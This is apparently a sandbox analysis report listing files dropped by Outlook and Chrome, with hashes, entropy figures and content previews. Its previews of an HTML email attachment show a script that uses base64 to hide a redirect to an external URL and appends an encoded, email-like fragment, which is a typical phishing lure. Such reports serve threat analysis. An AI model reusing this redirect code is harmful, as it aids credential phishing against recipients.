                                                                                                              Category:dropped
                                                                                                              Size (bytes):45352
                                                                                                              Entropy (8bit):0.3934156674412528
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:6UlK6Q1Lt93Ull7DYMLlJ/zO8VFDYMLmjx:6UEtFt9Ell4ElJ7jVGEYx
                                                                                                              MD5:04DC3826622450F46175763E31336A01
                                                                                                              SHA1:4EBAB0AB08BD724AE3E1BF1BC3C600BC819D2543
                                                                                                              SHA-256:F649D66B5C2CC15F9EB1F9286B0A5AC7122FD6B64C7EA52AEDB1B2FB3CD432DD
                                                                                                              SHA-512:D3FA5E4EE5EA620E6E286CA978803F17DB6E85EDF44D26F08BFFD24EA9E8BD2817D247B3A111298B55D6AB2F7041DDD1016B95795743F27F5AE889866081E096
                                                                                                              Malicious:false
                                                                                                              Preview:7....-............Xe....:?..&............Xe........n:.SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Outlook\RoamCache\Stream_WorkHours_1_3A913F8331956F42BEDFDD4F30C820BB.dat

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):715
                                                                                                              Entropy (8bit):4.935923051709176
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:TMG45G7PHzABooZKIYhrxioxhoeBooZKIYhMQioXeotMycU2xxsujRocLssFW0:3ikHI0IYhrx1b0IYhMQ79Mxxj6cLZFW0
                                                                                                              MD5:9CA1DA1D62A9FF574E63B8946B541C96
                                                                                                              SHA1:E9821F6D0A8F829D23E3A95F45D488D6BCB391F7
                                                                                                              SHA-256:B6B10A07FAA634027F3780E77FC3B165DCF7D37E800195BFF5E147CCC492B828
                                                                                                              SHA-512:B01B74A08FB9D5056AEF3FD780FF1AE4F06784BC8094AB49F0583D1DA1B040CFE765F15C5E0A9DE0C6C1A1E149ECD3EA597CAEB9A221176DF491C02F7F361A85
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0"?>..<Root xmlns="WorkingHours.xsd">...<WorkHoursVersion1>....<TimeZone>.....<Bias>300</Bias>.....<Standard>......<Bias>0</Bias>......<ChangeDate>.......<Time>02:00:00</Time>.......<Date>0000/11/01</Date>.......<DayOfWeek>0</DayOfWeek>......</ChangeDate>.....</Standard>.....<DaylightSavings>......<Bias>-60</Bias>......<ChangeDate>.......<Time>02:00:00</Time>.......<Date>0000/03/02</Date>.......<DayOfWeek>0</DayOfWeek>......</ChangeDate>.....</DaylightSavings>.....<Name>Eastern Standard Time</Name>....</TimeZone>....<TimeSlot>.....<Start>08:00:00</Start>.....<End>17:00:00</End>....</TimeSlot>....<WorkDays>Monday Tuesday Wednesday Thursday Friday</WorkDays>...</WorkHoursVersion1>..</Root>..

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\ATT47968 (002).htm

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):232
                                                                                                              Entropy (8bit):5.7819793290627555
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:7fWmmnHx0l1ILqR6ylrxn8mbb0UlCRY3Vq3HVb:7fWxnR0lmGsErJhbF5EXVb
                                                                                                              MD5:8B7A6E066CC4941AFCD1D477EB4C69E5
                                                                                                              SHA1:033F21456B7B59C0398516C0DC3E67735F7BEB9B
                                                                                                              SHA-256:DA2010D7DF96E82E2A9270D37A33175AF34F158F08CBD578B42B0259504D3419
                                                                                                              SHA-512:C268968F521BC356ABB0415F0833104562391A0BCC525B5D59F6D44C620481C08761F26AB9EE6A54E46F9CE267F410786F3F07E4ECAFAD8DFA1B6835F9DEDA1D
                                                                                                              Malicious:false
                                                                                                              Preview:<script>.. window.location.href = atob("aHR0cHM6Ly9tYXJ0eS1uLmNvbS9vLz9jM1k5YnpNMk5WOHhYMjV2YlNaeVlXNWtQVTVYWkRKUlYyTTlKblZwWkQxVlUwVlNNVFV3T1RJd01qUlZNVEF3T1RFMU1UQT0=") + "#" + "cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=";..</script>

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\ATT47968 (002).htm:Zone.Identifier

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:gAWY3n:qY3n
                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                              Malicious:false
                                                                                                              Preview:[ZoneTransfer]..ZoneId=3..

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\ATT47968.htm

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):232
                                                                                                              Entropy (8bit):5.7819793290627555
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:7fWmmnHx0l1ILqR6ylrxn8mbb0UlCRY3Vq3HVb:7fWxnR0lmGsErJhbF5EXVb
                                                                                                              MD5:8B7A6E066CC4941AFCD1D477EB4C69E5
                                                                                                              SHA1:033F21456B7B59C0398516C0DC3E67735F7BEB9B
                                                                                                              SHA-256:DA2010D7DF96E82E2A9270D37A33175AF34F158F08CBD578B42B0259504D3419
                                                                                                              SHA-512:C268968F521BC356ABB0415F0833104562391A0BCC525B5D59F6D44C620481C08761F26AB9EE6A54E46F9CE267F410786F3F07E4ECAFAD8DFA1B6835F9DEDA1D
                                                                                                              Malicious:false
                                                                                                              Preview:<script>.. window.location.href = atob("aHR0cHM6Ly9tYXJ0eS1uLmNvbS9vLz9jM1k5YnpNMk5WOHhYMjV2YlNaeVlXNWtQVTVYWkRKUlYyTTlKblZwWkQxVlUwVlNNVFV3T1RJd01qUlZNVEF3T1RFMU1UQT0=") + "#" + "cm9iLmt1c3RlckBzdG9uaGFyZC5jb20=";..</script>

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\ATT47968.htm:Zone.Identifier

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:gAWY3n:qY3n
                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                              Malicious:false
                                                                                                              Preview:[ZoneTransfer]..ZoneId=3..

                                                                                                              C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1729887701710812900_8D7842C9-AED5-49B1-8FEC-AE2E21BB7C84.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:ASCII text, with very long lines (859), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20971520
                                                                                                              Entropy (8bit):0.006740592005499964
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:/eZisgvrWKTyLRhxjqeeks12CSNx4H3C3oB:GZ+NTyLnxjqeekO2CSNxu3C3oB
                                                                                                              MD5:8231E3F1BD5821FA63A69CEC50D8B7DE
                                                                                                              SHA1:2B8565CD98D54DCF8E8435FA1DFBE08A02B482A3
                                                                                                              SHA-256:54BC83D59F9FAE9107CA970E7E4CE13F24A59941256F67B5686A89197B90742F
                                                                                                              SHA-512:761F9919B27060C89100DAD956F63ED37A4298D241D982582D188A524D625FCD48365835C374366EDB7448C95CE122E76CE2F262D133269A74FE02586564EB91
                                                                                                              Malicious:false
                                                                                                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/25/2024 20:21:41.751.OUTLOOK (0x1BA0).0x1B9C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.System.GracefulExit.GracefulAppExitDesktop","Flags":33777014402039809,"InternalSequenceNumber":17,"Time":"2024-10-25T20:21:41.751Z","Data.PreviousAppMajor":16,"Data.PreviousAppMinor":0,"Data.PreviousAppBuild":16827,"Data.PreviousAppRevision":20130,"Data.PreviousSessionId":"184B9343-C836-462B-A9CB-00B8910306B2","Data.PreviousSessionInitTime":"2024-10-25T20:21:16.721Z","Data.PreviousSessionUninitTime":"2024-10-25T20:21:19.721Z","Data.SessionFlags":2147483652,"Data.InstallMethod":0,"Data.OfficeUILang":1033,"Data.PreviousBuild":"Unknown","Data.EcsETag":"\"\"","Data.ProcessorArchitecture":"x64"}...10/25/2024 20:21:41.799.OUTLOOK (0x1BA0).0xA74.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,

                                                                                                              C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1729887701712099100_8D7842C9-AED5-49B1-8FEC-AE2E21BB7C84.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20971520
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241025T1621410419-7072.etl

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):122880
                                                                                                              Entropy (8bit):4.69230500931137
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:K6Nu98LJa/Hl4IPTW9pGXiIT5FWI1ukAsS9WOvX6YxApAXYcWmW7WAW3p3bgfK:s4iW9pGFSsS9WOvKY+qXFpIK
                                                                                                              MD5:24A81AD08A6574C77389E6CC92CE075E
                                                                                                              SHA1:5D9D23D3CB0B128115FA4AD174B4E23E0B4EAEE8
                                                                                                              SHA-256:023127D47762D1AE12A1127E5878E2681775A6A1AFB597BFCC7AFF659691AD43
                                                                                                              SHA-512:17F62B4AFDA06DA77F89857B48884A22E91DEFE373BFC74C06D486F24ABE51E745164D2B3A66A505EED9842E2E270365F19269F1A8CAAB286FED823622AB6EF8
                                                                                                              Malicious:false
                                                                                                              Preview:............................................................................`............=...'..................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................$.j.Y...........=...'..........v.2._.O.U.T.L.O.O.K.:.1.b.a.0.:.f.f.8.f.a.3.3.b.d.4.6.1.4.9.4.3.b.9.4.3.c.3.7.4.9.1.a.b.4.8.1.5...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.2.5.T.1.6.2.1.4.1.0.4.1.9.-.7.0.7.2...e.t.l.......P.P..........=...'..........................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\~DF50E0CD84CD360BE1.TMP

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:CDFV2 Microsoft Outlook Message
                                                                                                              Category:dropped
                                                                                                              Size (bytes):81920
                                                                                                              Entropy (8bit):3.661238616175048
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:kWsKAWsKvFIL5vOrQfDNhXCmMgbGsNg+CDK9+kTQWsKhNguyD6p+ApZZ3sVj4o9Z:kW4WXeqSlCDK9+ksWp1yD6p+UDi6n
                                                                                                              MD5:C38057129D6556A6F48D0ACF37722447
                                                                                                              SHA1:9BF7461A8DF7D38B54F6CCD6BCA0375DE9AC71F6
                                                                                                              SHA-256:CE00A82F5D1DB84C48BBD8E4472D7B5ABE6A72EAF56D3147B7920B47CA0BCE54
                                                                                                              SHA-512:4B05EF5753D3904EA8D6B135A1CA195FED392147A74C6F3D0BD2F325224F53B00552407D8DFE4826C9AC843D4101B652C677A88A09C04539F11CBE1A1BC0B283
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[............................... ...;...=..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...>...?...@...A...B...C...D...F...E...G...H...I...S...T...K...L...M...N...O...P...Q...R.......V...U...a...W...X...Y...Z...\...s...]...^..._...`...b...m...c...d...e...f...g...h...i...j...k...l...o...n...p...q...r...t...v.......u...x...w...y...z.......

                                                                                                              C:\Users\user\AppData\Local\Temp\~DF522FEBF0EDBA3632.TMP

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                              Malicious:false
                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):30
                                                                                                              Entropy (8bit):1.2389205950315936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:+vhtt:+Zt
                                                                                                              MD5:CAC84A3670BD8BB908675EC49E9B91AD
                                                                                                              SHA1:C126210AA270AEE8BD38A030A928DB2FCA43C366
                                                                                                              SHA-256:5C662DD0945159CF5038EED85BB13431870B2ECA67D127FE481E420342564A03
                                                                                                              SHA-512:3AE0D985EE9BF81D29F85C8A34AA8F411EB752DC0BDE478E6258303376BF38878B477CF0D125B38B0A316C046B015ED315D5A0C32010822D9EA68845B463AE05
                                                                                                              Malicious:false
                                                                                                              Preview:..............................

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16384
                                                                                                              Entropy (8bit):0.6695073517883924
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:rl3baFGtqLKeTy2MyheC8T23BMyhe+S7wzQP9zNMyhe+S7xMyheCAc:rumnq1Py9615
                                                                                                              MD5:061557D43D7B7FB4C89F7B41F6192976
                                                                                                              SHA1:79C34AF8176EA23C8754E2E412E0052D7220645E
                                                                                                              SHA-256:5056C6641E5C079617ED1AF1B0229AA0CE1F8DA2D6700AED4A2A7735CCB0011E
                                                                                                              SHA-512:18202934C473E6945012BF70BC239444926291BF07DBCF4578331B34119304B1534B8B399CC767EDE78FEF954FAFE7227021C424EA1FE86D568E15238A817175
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 19:23:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2673
                                                                                                              Entropy (8bit):3.984304669623129
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:86dKTTq7WNHaidAKZdA1FehwiZUklqehJy+3:8LX2Cy
                                                                                                              MD5:22770891455983CCF99AEAB11FD930C0
                                                                                                              SHA1:81E1B85B7ADF5C8879356A6D8EF9CE1E00870C4A
                                                                                                              SHA-256:17D913CBB05A19ED019765E0767F01D17EA1ED8C177BDE9B2C4905821BF7C09E
                                                                                                              SHA-512:9F799A3128E15D76B5078AFC429975426743F2C224F32F51E18AFF891DA261074734ABD747D18726632E419609797126610972C45B40413DBBB5797EA94366A2
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,......n..'..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 19:23:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2675
                                                                                                              Entropy (8bit):4.002087332036404
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8U1dKTTq7WNHaidAKZdA1seh/iZUkAQkqehyy+2:8U+XQ9Qjy
                                                                                                              MD5:49E730ADBE9EDE9B5106BA2FAFCA1A77
                                                                                                              SHA1:CD53CA53AE6927096CC0DAC34DA78B09CB98AB48
                                                                                                              SHA-256:B413EED99C2203E5482873D5D334D26C8B51C59405616A3FEB00A593E7CDEAE5
                                                                                                              SHA-512:E4EDE1159CAF22D09F1C3F9A956189E5988F2396BD6F0FFD25311459F3B3756F21D997F29414F3F50BDD57E196E842212BBE3AA650F348EEE2EA8EABA67DECAC
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,......^..'..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2689
                                                                                                              Entropy (8bit):4.007807136186289
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8JdKTTq7WAHaidAKZdA14meh7sFiZUkmgqeh7sky+BX:86Xvnmy
                                                                                                              MD5:2D52AE7DD3703FB23ECD8679F5EF6B81
                                                                                                              SHA1:2CC9332D3CC7B00E27FF4506AF6D28C0F734A8B3
                                                                                                              SHA-256:51BB795980903FC9DED1342E415123C55002FC375B069CF8AF6F27E5D8762BDE
                                                                                                              SHA-512:BE93A43C069DE348F3EF404CCE37E4F07377B8524B0FDFF276ED18DD527F646B8A342F4A5D2222E06DADED63F5F08357FCF7F51AD106C08DA84C90087C9940B1
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 19:23:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2677
                                                                                                              Entropy (8bit):3.997673168881797
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8PwdKTTq7WNHaidAKZdA1TehDiZUkwqeh+y+R:8xXL8y
                                                                                                              MD5:6FD1A284AC32DA5180508C5437F91A0A
                                                                                                              SHA1:F4304EA50918D4093555766AF9FCA0417801198F
                                                                                                              SHA-256:13DE2FE84F6C2F283FEBF6571029E14E7A4B0098DA42545EC89C2D279671C261
                                                                                                              SHA-512:5C7AAE03C31692AE62039D6564DE81170CD2C56CEC44980E90C54B0883391376A20334D04AACEF656C3A13C1209859895EF1D8BEFC021E3D40606242C1172811
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,.....SW..'..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 19:23:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2677
                                                                                                              Entropy (8bit):3.986517756036162
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8pdKTTq7WNHaidAKZdA1dehBiZUk1W1qeh4y+C:8aXr9Yy
                                                                                                              MD5:F836F00774A27A5BF21DAC4236B9A253
                                                                                                              SHA1:4F406C95EA8C38B3DEF9DB590FFC9D3505FE54ED
                                                                                                              SHA-256:C20020855FD37B3DADCE99BC3B525FE3CFE87E34BE98BCF52FCAC5B90DB3F15E
                                                                                                              SHA-512:7136AB61F0A93987262C4B87E2F8837962185FFA2FC246C4482637ACED6ABAE32588A9601EA136CA207512F8FD28756FBE327B1D95890F880622A57546C744A7
                                                                                                              Malicious:false
